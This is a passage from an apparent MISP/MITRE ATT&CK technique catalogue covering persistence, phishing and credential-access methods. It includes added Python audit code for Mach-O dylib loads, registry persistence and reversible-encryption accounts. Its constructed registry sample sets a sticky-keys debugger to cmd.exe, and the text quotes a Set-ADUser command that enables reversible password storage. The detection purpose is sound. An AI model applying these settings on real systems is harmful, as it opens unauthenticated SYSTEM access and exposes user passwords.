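            if cmd == LC_LOAD_WEAK_DYLIB:
                report["weak"].append(path)       # process still starts if this is absent
            if path.startswith("@rpath/"):
                report["rpath_refs"].append(path)
        elif cmd == LC_RPATH:
            report["rpaths"].append(_lc_str(raw))
        elif cmd == LC_CODE_SIGNATURE:
            report["code_signature"] = True
    return report


def rpath_search_locations(report):
    """Expand each @rpath reference against the LC_RPATH list, in the order the
    loader tries them. A location that does not exist on disk is where a planted
    file with the expected name would be found first."""
    return {
        ref: [rp + "/" + ref[len("@rpath/"):] for rp in report["rpaths"]]
        for ref in report["rpath_refs"]
    }


def _build_cmd(cmd, fixed, path):
    """Pack one lc_str-bearing load command (for the constructed sample only)."""
    name = path.encode() + b"\0"
    name_off = 8 + 4 + len(fixed)          # cmd, cmdsize, lc_str offset, then fixed fields
    size = name_off + len(name)
    size += -size % 8                      # load commands are 8-byte aligned in 64-bit images
    return (struct.pack("<III", cmd, size, name_off) + fixed + name).ljust(size, b"\0")


def build_sample_macho():
    """Constructed header plus three load commands; not a real binary."""
    dylib_fixed = struct.pack("<III", 2, 0x10000, 0x10000)  # timestamp, current, compat version
    cmds = b"".join([
        _build_cmd(LC_RPATH, b"", "@executable_path/../Frameworks"),
        _build_cmd(LC_LOAD_DYLIB, dylib_fixed, "/usr/lib/libSystem.B.dylib"),
        _build_cmd(LC_LOAD_WEAK_DYLIB, dylib_fixed, "@rpath/libOptional.dylib"),
    ])
    # cputype x86_64, cpusubtype ALL, filetype MH_EXECUTE, ncmds 3, no LC_CODE_SIGNATURE
    header = struct.pack(HEADER_FMT, MH_MAGIC_64, 0x01000007, 3, 2, 3, len(cmds), 0, 0)
    return header + cmds


if __name__ == "__main__":
    report = audit_dylib_loads(build_sample_macho())
    print(report)
    print(rpath_search_locations(report))
```

On a real system, pass `open(path, "rb").read()` of a thin arm64 or x86_64 image to `audit_dylib_loads`; a weak or `@rpath` entry whose first search location is absent, or a distributed application with `code_signature` false, is what the two entries above describe and is worth a closer look.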

The tag is: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1546.006"

Table 6141. Table References

Links

https://attack.mitre.org/techniques/T1546/006

https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Spearphishing Voice - T1566.004

Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It differs from other forms of spearphishing in that it manipulates a user into providing access to systems through a phone call or other form of voice communication. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries do not directly send malware to a victim but instead rely on [User Execution](https://attack.mitre.org/techniques/T1204) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools ([Remote Access Software](https://attack.mitre.org/techniques/T1219)) onto their computer.(Citation: Unit42 Luna Moth)

Adversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621) in order to trick users into divulging MFA credentials or accepting authentication prompts.(Citation: Proofpoint Vishing)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Voice - T1566.004"

Table 6142. Table References

Links

https://attack.mitre.org/techniques/T1566/004

https://blog.sygnia.co/luna-moth-false-subscription-scams

https://unit42.paloaltonetworks.com/luna-moth-callback-phishing/

https://www.cisa.gov/uscert/ncas/alerts/aa23-025a

https://www.proofpoint.com/us/threat-reference/vishing

VBA Stomping - T1564.007

Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)

MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a <code>PerformanceCache</code> that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the <code>_VBA_PROJECT</code> stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)

An adversary may hide malicious VBA code by overwriting the VBA source code location with zeros, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even conclude that no macros are present. If there is a version match between the <code>_VBA_PROJECT</code> stream and the host MS Office application, the p-code will be executed; otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing the malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)

The tag is: misp-galaxy:mitre-attack-pattern="VBA Stomping - T1564.007"

Table 6143. Table References

Links

https://attack.mitre.org/techniques/T1564/007

https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239

https://github.com/bontchev/pcodedmp

https://github.com/decalage2/oletools

https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278

https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/

https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html

Accessibility Features - T1546.008

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times, and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later, as well as Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)

  • On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>

  • Magnifier: <code>C:\Windows\System32\Magnify.exe</code>

  • Narrator: <code>C:\Windows\System32\Narrator.exe</code>

  • Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>

  • App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008"

Table 6144. Table References

Links

http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

https://attack.mitre.org/techniques/T1546/008

https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom

Web Services - T1584.006

Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user’s access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.

The tag is: misp-galaxy:mitre-attack-pattern="Web Services - T1584.006"

Table 6145. Table References

Links

https://attack.mitre.org/techniques/T1584/006

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.recordedfuture.com/turla-apt-infrastructure/

AppCert DLLs - T1546.009

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. (Citation: Elastic Process Injection July 2017)

Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.
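Both this AppCert DLLs entry and the Accessibility Features entry above (T1546.008, including its Image File Execution Options debugger variant) leave their footprint as Registry values that can be audited from an offline export. The following is an added example, not code from the MISP project or from ATT&CK: it parses a regedit <code>.reg</code> export and flags any value under the <code>AppCertDLLs</code> key named above, and any <code>Debugger</code> value set on one of the accessibility binaries listed in T1546.008. The <code>AppCertDLLs</code> path is the one on the page; the Image File Execution Options key path is the standard Windows location and is not quoted on this page. The export text is constructed for the example and does not come from a real host.

```python
# Key paths: AppCertDLLs is named in the T1546.009 text above; the Image File
# Execution Options (IFEO) key is the standard Windows location that the
# T1546.008 text refers to via T1546.012.
APPCERT_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs"
IFEO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Accessibility binaries listed in the T1546.008 text (matched case-insensitively).
ACCESSIBILITY_BINARIES = {
    "sethc.exe", "utilman.exe", "osk.exe", "magnify.exe",
    "narrator.exe", "displayswitch.exe", "atbroker.exe",
}


def parse_reg_export(text):
    """Parse a regedit export ('Windows Registry Editor Version 5.00' format)
    into {key_path: {value_name: data}}. REG_SZ data is unescaped; other
    value types are kept in their textual export form."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, data = line.split("=", 1)
        name = "(Default)" if name == "@" else name.strip('"')
        if data.startswith('"') and data.endswith('"'):
            # regedit writes REG_SZ with \\ for a backslash and \" for a quote
            data = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        keys[current][name] = data
    return keys


def audit_reg_export(text):
    """Return [(technique_id, description), ...] for the two persistence spots."""
    keys = parse_reg_export(text)
    by_lower = {k.lower(): k for k in keys}   # Registry paths are case-insensitive
    findings = []

    appcert = by_lower.get(APPCERT_KEY.lower())
    if appcert:
        # Any DLL listed here is loaded into every process calling CreateProcess & co.
        for name, dll in keys[appcert].items():
            findings.append(("T1546.009", f"AppCertDLLs value {name!r} loads {dll}"))

    ifeo_prefix = IFEO_KEY.lower() + "\\"
    for k_lower, k in by_lower.items():
        if not k_lower.startswith(ifeo_prefix):
            continue
        binary = k_lower[len(ifeo_prefix):]   # immediate subkey is the image name
        debugger = keys[k].get("Debugger")
        # Only the accessibility binaries are reported; a broader audit would
        # list every Debugger value and review it against known developer use.
        if debugger and binary in ACCESSIBILITY_BINARIES:
            findings.append(("T1546.008", f"IFEO Debugger on {binary} -> {debugger}"))
    return findings


# Constructed sample export for the example; not taken from a real system.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

; constructed sample, not a real host
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\AppCertDLLs]
"updater"="C:\\Users\\Public\\hook.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe]
"Debugger"="C:\\Windows\\System32\\cmd.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"Debugger"="C:\\Tools\\debugger.exe"
"""


def run_sample_audit():
    return audit_reg_export(SAMPLE_REG_EXPORT)


if __name__ == "__main__":
    for technique, message in run_sample_audit():
        print(technique, message)
```

The `notepad.exe` entry in the sample is deliberately left unflagged to show the filter: an IFEO debugger on an arbitrary program can be a legitimate developer setting, whereas one on a binary launchable from the logon screen has no normal use. Feed the function an export taken with `reg export` of the two hives on a system under review.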

The tag is: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009"

Table 6146. Table References

Links

https://attack.mitre.org/techniques/T1546/009

https://forum.sysinternals.com/appcertdlls_topic12546.html

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Resource Forking - T1564.009

Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using <code>ls -l@</code> or <code>xattr -l</code> commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the <code>/Resources</code> folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)

Adversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Resource Forking - T1564.009"

Table 6147. Table References

Links

http://tenon.com/products/codebuilder/User_Guide/6_File_Systems.html#anchor520553

https://attack.mitre.org/techniques/T1564/009

https://blogs.vmware.com/security/2020/06/tau-threat-analysis-bundlore-macos-mm-install-macos.html

https://eclecticlight.co/2020/10/24/theres-more-to-files-than-data-extended-attributes/

https://flylib.com/books/en/4.395.1.192/1/

https://www.sentinelone.com/labs/resourceful-macos-malware-hides-in-named-fork/

LSASS Driver - T1547.008

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008"

Table 6148. Table References

Links

https://attack.mitre.org/techniques/T1547/008

https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://technet.microsoft.com/library/cc961760.aspx

https://technet.microsoft.com/library/dn408187.aspx

Shortcut Modification - T1547.009

Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.

Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.

The tag is: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009"

Table 6149. Table References

Links

https://attack.mitre.org/techniques/T1547/009

https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence

https://www.youtube.com/watch?v=nJ0UsyiUEqQ

Digital Certificates - T1588.004

Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.

Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.

Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let’s Encrypt FAQ)

After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.

The tag is: misp-galaxy:mitre-attack-pattern="Digital Certificates - T1588.004"

Table 6150. Table References

Links

https://attack.mitre.org/techniques/T1588/004

https://letsencrypt.org/docs/faq/

https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

https://www.recordedfuture.com/cobalt-strike-servers/

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Spearphishing Voice - T1598.004

Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.

All forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or "vishing"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.(Citation: BOA Telephone Scams)

Victims may also receive phishing messages that direct them to call a phone number ("callback phishing") where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)

Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to tailor pretexts to be even more persuasive and believable for the victim.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Voice - T1598.004"

Table 6151. Table References

Links

https://attack.mitre.org/techniques/T1598/004

https://business.bofa.com/en-us/content/what-is-vishing.html

https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing

Password Managers - T1555.005

Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)

Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610) Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Password Managers - T1555.005"

Table 6152. Table References

Links

https://attack.mitre.org/techniques/T1555/005

https://github.com/GhostPack/KeeThief

https://nvd.nist.gov/vuln/detail/CVE-2019-3610

https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware

https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf

https://www.ise.io/casestudies/password-manager-hacking/

Reversible Encryption - T1556.005

An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software requires it.(Citation: store_pwd_rev_enc)

If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:

  1. Encrypted password (<code>G$RADIUSCHAP</code>) from the Active Directory user-structure <code>userParameters</code>

  2. 16 byte randomly-generated value (<code>G$RADIUSCHAPKEY</code>) also from <code>userParameters</code>

  3. Global LSA secret (<code>G$MSRADIUSCHAPKEY</code>)

  4. Static key hardcoded in the Remote Access Subauthentication DLL (<code>RASSFM.DLL</code>)

With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)

An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply an FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code>.
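The four components listed above are what recovery of the plaintext requires; the defender's check is simpler, because the per-account setting is a single bit (<code>ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED</code>, 0x80) in <code>userAccountControl</code>, and, as the text notes, only passwords set or changed after the flag was enabled are stored in recoverable form. The following is an added example, not code from the MISP project or from ATT&CK: it decodes that bit from exported account records and, given the date the flag is known to have appeared, uses <code>pwdLastSet</code> to say whether each flagged account's current password is exposed. The records and the reference date are constructed for the example; the FILETIME conversion is the standard one for <code>pwdLastSet</code>.

```python
from datetime import datetime, timedelta, timezone

# userAccountControl bit flags (ADS_USER_FLAG_ENUM); only the ones used here.
UF_ACCOUNTDISABLE = 0x0002
UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED = 0x0080  # "Store password using reversible encryption"
UF_NORMAL_ACCOUNT = 0x0200

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ft):
    """pwdLastSet is a Windows FILETIME: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    """Inverse of the above, used here only to build the constructed sample."""
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def decode_uac(uac):
    """Extract the two flags this check cares about."""
    return {
        "disabled": bool(uac & UF_ACCOUNTDISABLE),
        "reversible": bool(uac & UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED),
    }


def find_reversible_accounts(records, flag_enabled_since=None):
    """Return accounts whose userAccountControl permits reversible encryption.

    Only passwords set after the flag was enabled are stored recoverably, so
    when the caller knows when the flag appeared (flag_enabled_since), the
    pwdLastSet timestamp decides whether the current password is exposed.
    Without that date every flagged account is treated as exposed."""
    hits = []
    for rec in records:
        flags = decode_uac(rec["userAccountControl"])
        if not flags["reversible"]:
            continue
        pwd_last_set = filetime_to_datetime(rec["pwdLastSet"]) if rec.get("pwdLastSet") else None
        exposed = flag_enabled_since is None or (
            pwd_last_set is not None and pwd_last_set >= flag_enabled_since
        )
        hits.append({
            "dn": rec["distinguishedName"],
            "disabled": flags["disabled"],
            "pwdLastSet": pwd_last_set,
            "plaintext_recoverable": exposed,
        })
    return hits


# Constructed sample records in the shape an LDAP export yields; not real accounts.
SAMPLE_RECORDS = [
    {"distinguishedName": "CN=alice,OU=Staff,DC=example,DC=test",
     "userAccountControl": UF_NORMAL_ACCOUNT,
     "pwdLastSet": datetime_to_filetime(datetime(2024, 1, 10, tzinfo=timezone.utc))},
    {"distinguishedName": "CN=svc-legacy,OU=Service,DC=example,DC=test",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED,
     "pwdLastSet": datetime_to_filetime(datetime(2024, 1, 15, tzinfo=timezone.utc))},
    {"distinguishedName": "CN=old-admin,OU=Staff,DC=example,DC=test",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED | UF_ACCOUNTDISABLE,
     "pwdLastSet": datetime_to_filetime(datetime(2022, 3, 1, tzinfo=timezone.utc))},
]

# Assumed date the flag is known to have been enabled (e.g. from a policy change log).
FLAG_ENABLED_SINCE = datetime(2023, 6, 1, tzinfo=timezone.utc)


def run_sample_audit():
    return find_reversible_accounts(SAMPLE_RECORDS, FLAG_ENABLED_SINCE)


if __name__ == "__main__":
    for hit in run_sample_audit():
        print(hit)
```

On a live domain the same property the page shows being set can be read back through the ActiveDirectory module's <code>Get-ADUser</code> (requesting <code>userAccountControl</code> and <code>pwdLastSet</code>) and the records handed to <code>find_reversible_accounts</code>; the disabled <code>old-admin</code> sample shows why the password-change date matters, since a password last set before the flag appeared was never stored in recoverable form.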

The tag is: misp-galaxy:mitre-attack-pattern="Reversible Encryption - T1556.005"

Table 6153. Table References

Links

http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html

http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html

https://adsecurity.org/?p=2053

https://attack.mitre.org/techniques/T1556/005

https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption

Hybrid Identity - T1556.007

Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.

Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity):

  • Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud

  • Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory

  • Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD

AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.

By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the AzureADConnectAuthenticationAgentService process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the Microsoft.IdentityServer.Servicehost configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb)

In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors)

The tag is: misp-galaxy:mitre-attack-pattern="Hybrid Identity - T1556.007"

Table 6154. Table References

Links

https://attack.mitre.org/techniques/T1556/007

https://blog.xpnsec.com/azuread-connect-for-redteam/

https://learn.microsoft.com/en-us/azure/active-directory/hybrid/choose-ad-authn

https://o365blog.com/post/on-prem_admin/

https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors

https://www.microsoft.com/security/blog/2022/08/24/magicweb-nobeliums-post-compromise-trick-to-authenticate-as-anyone/

Scan Databases - T1596.005

Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)

Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

